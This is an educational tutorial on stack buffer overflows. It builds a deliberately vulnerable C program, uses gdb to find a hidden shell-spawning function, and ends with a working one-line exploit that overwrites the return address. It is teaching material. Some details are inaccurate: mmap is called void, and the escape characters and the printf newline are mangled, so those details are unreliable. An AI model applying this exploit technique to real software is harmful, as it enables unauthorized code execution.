A Foundation for Buffer Overflow Attacks

Buffer overflows are some of the oldest and most important attacks against computer technology. These types of attacks are commonly associated with low level languages (like C and C++), but are not exclusive to them. Despite the importance of understanding this type of attack, there are still a large number of technical people who still don't fully understand it. Hopefully, this article will give you some basic insight into how buffer overflows work and why they are useful/dangerous. This guide will attempt to give you a very basic understanding on the concepts behind these attacks, but please bare in mind: due to a variety of protection mechanisms that are built into modern systems it is actually much more difficult to exploit modern systems using these attacks than it used to be. (If you are reading this to play The Hacker's Sandbox, then everything here is still applicable.)

So what is a buffer overflow?

Buffer overflows are attacks that allow for an unintentional (by design) change in the logical flow of an application. When information needs to be stored in memory, it will either land in the stack, or (for long-term and dynamic data) the heap. (This article will deal specifically with Stack overflows, though similar concepts will apply to the heap as well.) The stack is a region of memory that gets created on every thread that your application is running on. It works using a Last-In, First Out (LIFO) model, where data is said to be either pushed onto or popped off of the stack. When an application wants to store data into a buffer, it will allocate memory on the stack to be filled for that purpose. It can later be manipulated or moved to the heap as needed. The danger comes in when the application tries to write more data to the stack than has been allocated for the buffer. In this instance, an application can overwrite other important locations in memory, causing the program to corrupt or the logical flow of the program to change.

Examining the stack

To understand this a little better, let's take a look at an abstraction of the stack. You can easily visualize the stack using the following parts:

[BUFFER][STACK_FRAME_POINTER][RETURN_ADDRESS]

Image that you have three cards that you want to put down in the buffer. Card A, Card B, and Card C. You can push them down one at a time, first Card A, then Card B, last Card C. You will now have a buffer on the stack that looks like this:

Card C
Card B
Card A

If you wanted to then access Card B, first you would have to pop Card C off of the stack in order to access it. This is the basis for memory management on the stack, and is crucial to understand for understanding buffer overflows. We can take this a step further and see how a real-world function would work with the stack.

I am going to use the mmap() system function exposed by the Linux kernel. Looking at the man pages, you can see the function looks like this:

void *mmap(
 void *addr,
 size_t length,
 int prot,
 int flags,
 int fd,
 off_t offset
 );

If we were to call this function, first we would push the return variable, then we would push each argument onto the stack in reverse order, and finally we would make the call to mmap(). (In this case, the function is void, so no return variable will be pushed.) Abstractly, it would look something like this:

PUSH off_t offset
PUSH int fd,
PUSH int flags,
PUSH int prot,
PUSH size_t length,
PUSH void *addr,
CALL mmap

Once finished, our actual stack will look like this:

void *addr,
size_t length,
int prot,
int flags,
int fd,
off_t offset

Don't worry about the actual data here, the important part is that you understand how the stack works to be able to understand how to exploit it. This is all well and good, but how does it actually help you to control the flow of a program? Well, In addition to holding the buffer, the stack also holds a frame pointer, and the address to return to after a function has finished executing. Let's take another look at that stack:

[BUFFER][STACK_FRAME_POINTER][RETURN_ADDRESS]

Did you notice it? The buffer is placed on the stack before the return address. If we could keep pushing data onto to buffer until it overflows into the RETURN_ADDRESS, we would change where the program thinks it should be jumping back to.

A little bit of math

Ok, so now we know the theory behind overflowing buffers, but how do we know how much data we need to actually exploit this? The truth is, that depends on a few factors, such as your architecture. Computers of different architectures will follow this same stack model, but their memory allocation won't always be the same. You see, every machine architecture has a minimum amount of storage it needs to allocate. Think of it in terms of blocks. A system can only reserve 1 block at a time. If your program were to request only half a block worth of data, the system would need to reserve a full block to satiate that request.

On a 32 bit system, this block is going to be 32 bits. On a 64 bit system, each block will be 64 bits.

So if we were to request 1 byte of data (8 bits), on a 32 bit system, we would end up reserving 4 bytes (32 bits), while on a 64 bit system, we would end up reserving 8 bytes (64 bits).

In order to actually change the RETURN_ADDRESS, first we would need to fill our complete buffer (all of the space reserved for us), then we would need to overflow the stack pointer (this will usually be 1 block of space), and finally we would be able to overwrite the RETURN_ADDRESS (also 1 block in size.)

To complicate this matter more, modern compilers will often use padding on the buffers which will depend on various factors (such as data type and size) which will effect the reserved memory size. Often, the easiest way to determine how large your buffer is would be to open your application in a debugger and actually look at the assembly. If you are playing The Hacker's Sandbox, assume that there is no padding from the compiler.

Some practical examples

The following is a small C application (overflow.c) which will have no measures in place to protect it from buffer overflows.

#include <string.h>
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char **argv)
{
    char buf[10];
    strcpy(buf,argv[1]);
    return 0;
}

void the_shell()
{
    printf("pwned!
");
    system("/bin/sh");
}

This program is pretty simple. It takes the first argument into the program and places that into a buffer that is 10 bytes long. Notice that there is also a function called the_shell() which never actually gets called. The code exists inside of it, however, to spawn a shell running as the owner of the program. (The truth is, this would be a pretty useless program in real life, but it suits our demonstration very well.)

We could easily try to compile this into a program called overflow. For the purposes of this demonstration, we will be compiling on a 32 bit architecture:

$ gcc -o overflow overflow.c

Note: This compile would be incomplete on a modern machine. Modern compilers, like gcc, would have multiple mechanisms in place, like a stack guard and NX memory regions, which you would need to disable and/or bypass in order to successfully exploit your binaries.

Now, we can try playing around with this for a bit. If we passed an argument of 10 characters (say 0000000000), we will notice the program does nothing, and simply exits. However, if we pass a much longer argument, of say 30 characters, it will crash. The application crashes because key pieces of data become corrupt (like our return address, which likely now points to a nonexistent region of memory), and the logical flow of the program can not continue. So how do we send just enough data to overflow the stack and change the flow of execution without crashing the program? Let's try to fill the stack just enough to trick it into returning to our hidden function the_shell(). Conceptually, we will need to fill the stack so it looks like this on our 32 bit system:

[garbage data] 12 bytes [garbage data] 4 bytes [address of the_shell] 4 bytes

Remember, when the buffer requests 10 bytes, the smallest amount of 32 bit blocks (4 bytes) we can use is 3. Thus, 4 bytes X 3 = 12 bytes.

First, we would fire up our binary in a debugger. We'll use gdb for this example; just launch it against our executable to get an interactive debugging shell:

$ gdb overflow
(gdb)

We know from our source example that we want to try to find the location of the_shell() to fire off our attack. We can simply use gdb's disassembly command to dump out that function, and see what address the beginning of the function has been mapped to.

(gdb) disas the_shell
Dump of assembler code for function the_shell:
   0x080484a4 <+0>: push %ebp
   0x080484a5 <+1>: mov %esp,%ebp
   0x080484a7 <+3>: sub $0x18,%esp
   0x080484aa <+6>: movl $0x8048560,(%esp)
   0x080484b1 <+13>:    call 0x8048350 <puts@plt>
   0x080484b6 <+18>:    movl $0x8048567,(%esp)
   0x080484bd <+25>:    call 0x8048360 <system@plt>
   0x080484c2 <+30>:    leave  
   0x080484c3 <+31>:    ret    
End of assembler dump.
(gdb)

Here, we can see that the entry point for the_shell is 0x080484a4. We're almost there! Before we can execute our attack, we need to push the address onto the stack in the correct order. Remember, our input is being placed on the stack by strcpy() 1 byte at a time. As a result, our bytes are going to look reversed in a dump from the way we would expect to see it. Therefore, we are going to need to input the bytes (one at a time) in reverse order: 0xa4 0x84 0x04 0x08

Putting this all together

Finally, we're ready to launch the attack. We'll need to send garbage data to overflow the buffer (12 bytes for the buffer + 4 bytes for the SFP), and then our payload. We can easily just use 0's for our garbage data. Unfortunately, 0x08 and 0x04 are not printable characters, so we will need to find some way to inject these bytes into our program. A lot of hackers tend to like using a C, Perl, or Python program to do this. Personally, I just tend to use the echo command inside my Bash shell (but feel free to use whatever suits you best). Using the -e flag for echo, I can allow escaped sequences in my strings, and -n will suppress appending newline characters.

$ ./overflow 0000000000000000$(echo -ne "xa4x84x04x08")
pwned!
$

Success! We've been able to alter the flow of execution in our binary to run the hidden shell code.

Again, if if you trying this on a modern system, there are a few more safe guards that need to be taken into consideration before this will work. For example, you would probably need to disable the NX flag from your binaries (you can use execstack on Linux systems to do this.) But if you are playing The Hacker's Sandbox, you won't need to worry about any of that.

For additional information on running buffer overflows against modern systems, I would recommend reading Smashing the Stack in 2011.